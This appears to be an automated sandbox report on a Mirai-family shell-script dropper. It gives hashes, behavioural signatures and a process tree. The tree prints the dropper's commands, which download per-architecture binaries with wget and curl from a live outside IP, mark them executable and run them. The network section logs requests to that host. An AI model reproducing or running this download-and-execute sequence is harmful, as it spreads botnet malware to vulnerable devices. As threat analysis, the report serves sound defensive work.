Analysis
-
max time kernel
144s -
max time network
145s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
12/03/2025, 03:02 UTC
Static task
static1
Behavioral task
behavioral1
Sample
99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh
-
Size
2KB
-
MD5
62cb91c4ef22637c8ad25733622c1481
-
SHA1
a71f4c34d11d81505a2dca56ce349d2e077b30aa
-
SHA256
99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8
-
SHA512
2d033be2e64ec61c2f33c570c1cdab01da2dba5778ed65e69301c42858d0e6cd8d6f6faac86fdb14f5587225e3d49842d5401ef2102058b2c55c42e0e088d2e8
Malware Config
Extracted
mirai
UNSTABLE
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 814 chmod 822 chmod 827 chmod 833 chmod 691 chmod 705 chmod 724 chmod 742 chmod 760 chmod 769 chmod 802 chmod 808 chmod 682 chmod -
Deletes itself 2 IoCs
pid Process 726 WTH 770 WTH -
Executes dropped EXE 13 IoCs
ioc pid Process /tmp/WTH 683 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh /tmp/WTH 692 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh /tmp/WTH 707 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh /tmp/WTH 726 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh /tmp/WTH 743 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh /tmp/WTH 761 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh /tmp/WTH 770 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh /tmp/WTH 803 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh /tmp/WTH 809 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh /tmp/WTH 815 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh /tmp/WTH 823 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh /tmp/WTH 828 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh /tmp/WTH 834 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh -
Modifies Watchdog functionality 1 TTPs 4 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog WTH File opened for modification /dev/misc/watchdog WTH File opened for modification /dev/watchdog WTH File opened for modification /dev/misc/watchdog WTH -
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp WTH -
Writes file to system bin folder 4 IoCs
description ioc Process File opened for modification /sbin/watchdog WTH File opened for modification /bin/watchdog WTH File opened for modification /sbin/watchdog WTH File opened for modification /bin/watchdog WTH -
resource yara_rule behavioral2/files/fstream-1.dat upx behavioral2/files/fstream-4.dat upx behavioral2/files/fstream-5.dat upx behavioral2/files/fstream-6.dat upx behavioral2/files/fstream-7.dat upx -
Changes its process name 2 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself hrckt4d7c4db0klg 726 WTH Changes the process name, possibly in an attempt to hide itself b4bq6okmskj3 770 WTH -
Checks CPU configuration 1 TTPs 13 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp WTH -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/maps WTH File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/exe WTH File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/exe WTH File opened for reading /proc/self/maps WTH File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/exe WTH File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/exe WTH File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 686 wget 689 curl 690 cat -
Writes file to tmp directory 25 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/EdiAf.m68k wget File opened for modification /tmp/EdiAf.i686 curl File opened for modification /tmp/EdiAf.sh4 wget File opened for modification /tmp/EdiAf.sh4 curl File opened for modification /tmp/EdiAf.x86 curl File opened for modification /tmp/EdiAf.mpsl wget File opened for modification /tmp/EdiAf.ppc curl File opened for modification /tmp/EdiAf.mips curl File opened for modification /tmp/EdiAf.mpsl curl File opened for modification /tmp/EdiAf.arm wget File opened for modification /tmp/EdiAf.arm curl File opened for modification /tmp/EdiAf.arm6 wget File opened for modification /tmp/EdiAf.arc curl File opened for modification /tmp/EdiAf.x86 wget File opened for modification /tmp/EdiAf.mips wget File opened for modification /tmp/EdiAf.arm5 wget File opened for modification /tmp/EdiAf.arm6 curl File opened for modification /tmp/EdiAf.arm7 wget File opened for modification /tmp/EdiAf.m68k curl File opened for modification /tmp/EdiAf.spc wget File opened for modification /tmp/EdiAf.spc curl File opened for modification /tmp/WTH 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh File opened for modification /tmp/EdiAf.arm5 curl File opened for modification /tmp/EdiAf.arm7 curl File opened for modification /tmp/EdiAf.ppc wget
Processes
-
/tmp/99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh/tmp/99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:652 -
/usr/bin/wgetwget http://78.40.117.13/EdiAf.x862⤵
- Writes file to tmp directory
PID:654
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:671
-
-
/bin/catcat EdiAf.x862⤵PID:680
-
-
/bin/chmodchmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH2⤵
- File and Directory Permissions Modification
PID:682
-
-
/tmp/WTH./WTH pulse.selfrep2⤵PID:683
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:686
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:689
-
-
/bin/catcat EdiAf.mips2⤵
- System Network Configuration Discovery
PID:690
-
-
/bin/chmodchmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.mips EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH2⤵
- File and Directory Permissions Modification
PID:691
-
-
/tmp/WTH./WTH pulse.selfrep2⤵PID:692
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.mpsl2⤵
- Writes file to tmp directory
PID:694
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:697
-
-
/bin/catcat EdiAf.mpsl2⤵PID:704
-
-
/bin/chmodchmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.mips EdiAf.mpsl EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH2⤵
- File and Directory Permissions Modification
PID:705
-
-
/tmp/WTH./WTH pulse.selfrep2⤵PID:707
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.arm2⤵
- Writes file to tmp directory
PID:710
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.arm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:716
-
-
/bin/catcat EdiAf.arm2⤵PID:723
-
-
/bin/chmodchmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.arm EdiAf.mips EdiAf.mpsl EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH2⤵
- File and Directory Permissions Modification
PID:724
-
-
/tmp/WTH./WTH pulse.selfrep2⤵
- Deletes itself
- Modifies Watchdog functionality
- Writes file to system bin folder
- Changes its process name
- Reads runtime system information
PID:726
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.arm52⤵
- Writes file to tmp directory
PID:728
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:734
-
-
/bin/catcat EdiAf.arm52⤵PID:741
-
-
/bin/chmodchmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.arm EdiAf.arm5 EdiAf.mips EdiAf.mpsl EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/WTH./WTH pulse.selfrep2⤵
- Reads runtime system information
PID:743
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.arm62⤵
- Writes file to tmp directory
PID:744
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:753
-
-
/bin/catcat EdiAf.arm62⤵PID:759
-
-
/bin/chmodchmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.mips EdiAf.mpsl EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH2⤵
- File and Directory Permissions Modification
PID:760
-
-
/tmp/WTH./WTH pulse.selfrep2⤵
- Reads runtime system information
PID:761
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.arm72⤵
- Writes file to tmp directory
PID:762
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:763
-
-
/bin/catcat EdiAf.arm72⤵PID:767
-
-
/bin/chmodchmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.mips EdiAf.mpsl EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH2⤵
- File and Directory Permissions Modification
PID:769
-
-
/tmp/WTH./WTH pulse.selfrep2⤵
- Deletes itself
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:770
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.ppc2⤵
- Writes file to tmp directory
PID:798
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:800
-
-
/bin/catcat EdiAf.ppc2⤵PID:801
-
-
/bin/chmodchmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH2⤵
- File and Directory Permissions Modification
PID:802
-
-
/tmp/WTH./WTH pulse.selfrep2⤵PID:803
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.m68k2⤵
- Writes file to tmp directory
PID:805
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:806
-
-
/bin/catcat EdiAf.m68k2⤵PID:807
-
-
/bin/chmodchmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH2⤵
- File and Directory Permissions Modification
PID:808
-
-
/tmp/WTH./WTH pulse.selfrep2⤵PID:809
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.spc2⤵
- Writes file to tmp directory
PID:811
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.spc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:812
-
-
/bin/catcat EdiAf.spc2⤵PID:813
-
-
/bin/chmodchmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.spc EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH2⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/WTH./WTH pulse.selfrep2⤵PID:815
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.i6862⤵PID:817
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.i6862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:819
-
-
/bin/catcat EdiAf.i6862⤵PID:821
-
-
/bin/chmodchmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.i686 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.spc EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH2⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/WTH./WTH pulse.selfrep2⤵PID:823
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.sh42⤵
- Writes file to tmp directory
PID:824
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:825
-
-
/bin/catcat EdiAf.sh42⤵PID:826
-
-
/bin/chmodchmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.i686 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.sh4 EdiAf.spc EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH2⤵
- File and Directory Permissions Modification
PID:827
-
-
/tmp/WTH./WTH pulse.selfrep2⤵PID:828
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.arc2⤵PID:830
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.arc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:831
-
-
/bin/catcat EdiAf.arc2⤵PID:832
-
-
/bin/chmodchmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.arc EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.i686 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.sh4 EdiAf.spc EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH2⤵
- File and Directory Permissions Modification
PID:833
-
-
/tmp/WTH./WTH pulse.selfrep2⤵PID:834
-
Network
-
Remote address:78.40.117.13:80RequestGET /EdiAf.x86 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "7a54-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 31316
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Remote address:78.40.117.13:80RequestGET /EdiAf.x86 HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "7a54-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 31316
-
Remote address:78.40.117.13:80RequestGET /EdiAf.mips HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "86dc-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 34524
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Remote address:78.40.117.13:80RequestGET /EdiAf.mips HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "86dc-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 34524
-
Remote address:78.40.117.13:80RequestGET /EdiAf.mpsl HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "8c3c-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 35900
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Remote address:78.40.117.13:80RequestGET /EdiAf.mpsl HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "8c3c-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 35900
-
Remote address:78.40.117.13:80RequestGET /EdiAf.arm HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "8314-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 33556
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Remote address:78.40.117.13:80RequestGET /EdiAf.arm HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "8314-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 33556
-
Remote address:8.8.8.8:53Response
-
Remote address:8.8.8.8:53Response
-
Remote address:8.8.8.8:53Response
-
Remote address:8.8.8.8:53Response
-
Remote address:8.8.8.8:53Response
-
Remote address:78.40.117.13:80RequestGET /EdiAf.arm5 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "565c-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 22108
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Remote address:78.40.117.13:80RequestGET /EdiAf.arm5 HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "565c-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 22108
-
Remote address:78.40.117.13:80RequestGET /EdiAf.arm6 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "92e0-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 37600
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Remote address:78.40.117.13:80RequestGET /EdiAf.arm6 HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "92e0-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 37600
-
Remote address:78.40.117.13:80RequestGET /EdiAf.arm7 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "e5d8-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 58840
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Remote address:78.40.117.13:80RequestGET /EdiAf.arm7 HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "e5d8-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 58840
-
Remote address:8.8.8.8:53Requestdasdv1.service1921.clubIN AResponsedasdv1.service1921.clubIN A78.40.117.13
-
Remote address:78.40.117.13:80RequestGET /EdiAf.ppc HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "7cac-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 31916
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Remote address:78.40.117.13:80RequestGET /EdiAf.ppc HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "7cac-62fe79e79d7c0"
Accept-Ranges: bytes
Content-Length: 31916
-
Remote address:78.40.117.13:80RequestGET /EdiAf.m68k HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "12ff8-62fe79e8430d3"
Accept-Ranges: bytes
Content-Length: 77816
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Remote address:78.40.117.13:80RequestGET /EdiAf.m68k HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "12ff8-62fe79e8430d3"
Accept-Ranges: bytes
Content-Length: 77816
-
Remote address:78.40.117.13:80RequestGET /EdiAf.spc HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "12828-62fe79e8434bb"
Accept-Ranges: bytes
Content-Length: 75816
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Remote address:78.40.117.13:80RequestGET /EdiAf.spc HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "12828-62fe79e8434bb"
Accept-Ranges: bytes
Content-Length: 75816
-
Remote address:78.40.117.13:80RequestGET /EdiAf.i686 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.6 (CentOS)
Content-Length: 208
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
-
Remote address:78.40.117.13:80RequestGET /EdiAf.i686 HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.6 (CentOS)
Content-Length: 208
Content-Type: text/html; charset=iso-8859-1
-
Remote address:78.40.117.13:80RequestGET /EdiAf.sh4 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "10570-62fe79e8434bb"
Accept-Ranges: bytes
Content-Length: 66928
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Remote address:78.40.117.13:80RequestGET /EdiAf.sh4 HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 09 Mar 2025 12:01:43 GMT
ETag: "10570-62fe79e8434bb"
Accept-Ranges: bytes
Content-Length: 66928
-
Remote address:78.40.117.13:80RequestGET /EdiAf.arc HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 78.40.117.13
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.6 (CentOS)
Content-Length: 207
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
-
Remote address:78.40.117.13:80RequestGET /EdiAf.arc HTTP/1.1
Host: 78.40.117.13
User-Agent: curl/7.52.1
Accept: */*
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.6 (CentOS)
Content-Length: 207
Content-Type: text/html; charset=iso-8859-1
-
1.2kB 32.8kB 19 23
HTTP Request
